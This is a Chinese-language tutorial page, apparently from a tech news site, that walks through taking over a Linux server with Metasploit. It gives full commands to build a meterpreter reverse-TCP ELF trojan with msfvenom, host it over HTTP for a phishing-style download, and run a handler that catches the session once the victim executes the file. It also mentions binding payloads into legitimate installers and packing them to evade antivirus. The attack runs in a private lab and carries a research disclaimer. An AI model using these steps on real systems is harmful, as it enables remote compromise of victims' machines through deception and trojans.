当前位置: 首页 > news >正文

MSF 反弹 Shell 实战教程:从生成木马到获取服务器权限

声明:本文仅用于技术交流与安全防御研究,请勿用于非法用途。

一、这篇文章讲什么?

很多新手拿到 MSF(Metasploit Framework)不知道从哪里开始。这篇文章不讲复杂原理,只讲怎么一步步用 MSF 拿到一台 Linux 服务器的权限

你可以把它当成一份 MSF 使用教程,跟着敲命令就能看到效果。

二、环境说明

靶机:CentOS 7(192.168.66.136)
攻击机:Kali Linux(192.168.66.130)

三、核心流程(就三步)

第一步:生成木马 → 第二步:监听等待 → 第三步:让靶机运行木马

四、复现步骤

真实攻防演练中,攻击者不一定会找到 Web 漏洞。钓鱼 + 社会工程学是最常见的突破口——构造一个仿真的网站让受害者访问,诱使受害者下载运行木马。

第一步:在 Kali 上生成木马 payload
# 使用 msfvenom 生成 Linux 反弹 shell(ELF 格式) msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.66.130 LPORT=4444 -f elf -o shell.elf

参数说明:

  • -p linux/x64/meterpreter/reverse_tcp:Linux 64 位的 meterpreter 反向 TCP payload

  • LHOST=192.168.66.130:Kali(攻击机)的 IP

  • LPORT=4444:Kali 上监听的端口

  • -f elf:输出 ELF 可执行文件格式

实际攻击中,攻击者会使用捆绑器(如msfvenom -x)将 payload 注入到正常的 PDF 阅读器或安装包中,或对 ELF 文件进行加壳混淆,以降低杀软查杀率。本文聚焦后渗透阶段,故使用裸 payload 演示。

第二步:布置钓鱼页面,诱导下载

攻击者在 Kali 上搭建一个模拟的网站让靶机访问,点击shell.elf将木马下载到靶机(关闭防火墙)

# Kali 上起一个 HTTP 服务,提供木马下载 python3 -m http.server 2233

第三步:启动 MSF handler 等待回连
# 在 Kali 上启动 MSF 监听 msfconsole -q msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.66.130 msf6 exploit(multi/handler) > set LPORT 4444 msf6 exploit(multi/handler) > set ExitOnSession false msf6 exploit(multi/handler) > exploit -j # [*] Started reverse TCP handler on 192.168.66.130:4444

第四步:受害者下载并运行木马,在 Kali 上看到 session 建立
# 受害者(靶机的 cai 用户)下载木马elf后执行 chmod +x /home/cai/下载/shell.elf /home/cai/下载/shell.elf &

攻击者现在通过 meterpreter 完全控制了目标机器,权限为运行木马的cai(普通用户)。

http://www.jsqmd.com/news/1132404/

相关文章:

  • 数据视图学习博客笔记(含数据表对比)
  • 5个VADER情感分析技巧:社交媒体情感分析终极指南
  • 01-PEFT源码阅读-项目总览与设计理念
  • dbus的如何使用教程以及相关概念
  • 酷哇科技递表:从无人环卫成长起来的具身独角兽
  • Redis——分布式锁
  • 【windows】安装MiMoCode并使用
  • 计组面试--h自用
  • Lua--协同线程与文件IO
  • 小红书博主都在偷偷用的AI工具,不用懂代码就能自动运营
  • 从Copilot到Agent:AI编程助手的演进与未来
  • logback-spring.xml 完整生产模板
  • 完整RAG工作流达成!手把手教你使用NAS部署企业生产级AI知识库
  • 2000+机柜怎么管?数据中心U位资产管理方案拆解
  • CSS View Transitions:页面过渡要连续,也要可控
  • 智能办公本X2:端侧AI驱动的手写语音协同工作流
  • Java 面试:ConcurrentHashMap 为什么线程安全?
  • Lua--基础入门
  • 库存并发安全控制的架构设计
  • 谷歌两款AI学习工具大揭秘:NotebookLM与Learn About谁更胜一筹?
  • MySQL视图学习笔记——视图与数据表增删改操作对比
  • 多服务上线日记一:
  • Windows 7 Problem Steps Recorder
  • 5分钟掌握Spectralizer:OBS直播音频可视化插件终极配置指南
  • 大语言模型解码策略与低资源部署技术详解
  • 机器人操作鲁棒性:当灵巧手遇上真实世界的不确定性
  • LinkedIn钓鱼攻击深度解析:识别伪装官方通知与账户安全防护指南
  • 别再硬写提示词了!LangChain PromptTemplate从入门到实战
  • 在ASP.NET MVC中对表进行通用的增删改
  • Selenium 高级进阶操作详解